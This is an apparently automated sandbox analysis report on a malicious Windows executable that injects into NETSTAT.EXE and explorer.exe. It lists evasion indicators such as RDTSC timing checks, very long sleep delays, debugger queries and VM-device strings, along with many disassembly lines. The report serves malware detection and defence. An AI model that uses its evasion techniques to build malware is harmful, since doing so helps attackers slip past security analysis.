          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeRDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NETSTAT.EXERDTSC instruction interceptor: First address: 00000000009585E4 second address: 00000000009585EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NETSTAT.EXERDTSC instruction interceptor: First address: 000000000095896E second address: 0000000000958974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeCode function: 4_2_004088A0 rdtsc
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe TID: 6944Thread sleep time: -59255s >= -30000s
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe TID: 6972Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 6020Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\NETSTAT.EXELast function: Thread delayed
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeThread delayed: delay time: 59255
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeThread delayed: delay time: 922337203685477
          Source: explorer.exe, 00000005.00000000.715711377.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000005.00000000.720870223.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.748781487.0000000006650000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: NQBNpLezqZKv1P4.exeBinary or memory string: DdUXhZQ[fUE6Ws]YTSk6WLInYD73f[o5QsEYYq{nV]8XY[8XVpEzfoQZd5M[]WMZ][<IgogJD}4pfy]3[3Y5]DL[]}Y4[3Y5]D75esU[\moJezE[TiU[]qET]m8Z\3QqeMU[]K<IgogJD|YJg4E[eyQ3[3Y5]DL6e3Q5\xDjfoUZd5<pfTU6\osp\SQ[]mopg|Y5XlY5Y843[wEjfoUZd5<pfTU6\osp\SQ[e|<pU843[wEjfoQ[YDL[]nopgyMKX3QZ
          Source: explorer.exe, 00000005.00000000.720870223.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.721395078.000000000A715000.00000004.00000001.sdmpBinary or memory string: War&Prod_VMware_SATAa
          Source: explorer.exe, 00000005.00000000.725971847.000000000FD86000.00000004.00000001.sdmpBinary or memory string: E#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}TT
          Source: explorer.exe, 00000005.00000000.745709839.0000000004710000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
          Source: explorer.exe, 00000005.00000000.715711377.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000005.00000000.721395078.000000000A715000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
          Source: explorer.exe, 00000005.00000000.715711377.00000000058C0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000005.00000000.721588911.000000000A784000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
          Source: explorer.exe, 00000005.00000000.715711377.00000000058C0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess queried: DebugPort
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeCode function: 4_2_004088A0 rdtsc
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeCode function: 4_2_00409B10 LdrLoadDll,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0343DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0344EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03508B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0343F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0343DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0344FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03508F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03463B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03463B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0346A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0346A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0345F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034F131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034CFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034CFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0350070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0350070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03434F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03434F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0346E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034B53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034B53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034737F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034F138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03441B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03441B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034ED380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03448794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03462397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0346B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034B7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034B7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034B7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03464BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03464BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03464BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03505BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03439240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03439240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03439240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03439240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03447E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03447E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03447E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03447E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03447E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03447E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034C4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0344766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034EB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034EB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03508A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0345AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0345AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0345AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0345AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0345AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0347927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0343C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0343C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0343C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03468E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03448A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0343AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0343AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03453A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0346A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0346A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0343E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03474A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03474A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034EFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03478EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03508ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034636CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03462ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034EFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03462AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034616E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034476E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034CFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0346D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0346D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034B46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0344AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0344AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03500EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03500EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03500EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0346FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0345B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0345B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03473D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034B3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03457D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0343C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0343B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0343B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0345C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0345C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03439100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03439100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03439100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03508D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03454120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03454120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03454120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03454120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03454120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03443D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03443D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03443D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03443D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03443D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03443D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03443D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03443D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03443D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03443D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03443D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03443D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03443D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0343AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0346513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0346513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034BA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03464D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03464D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03464D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0343B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0343B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0343B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034C41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0344D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0344D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034E8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0346A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0345C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03462581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03462581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03462581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03462581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03432D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03432D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03432D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03432D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03432D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03462990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0346FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0346FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034661A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034661A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034635A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034B69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03461DB5 mov eax, dword ptr fs:[00000030h]
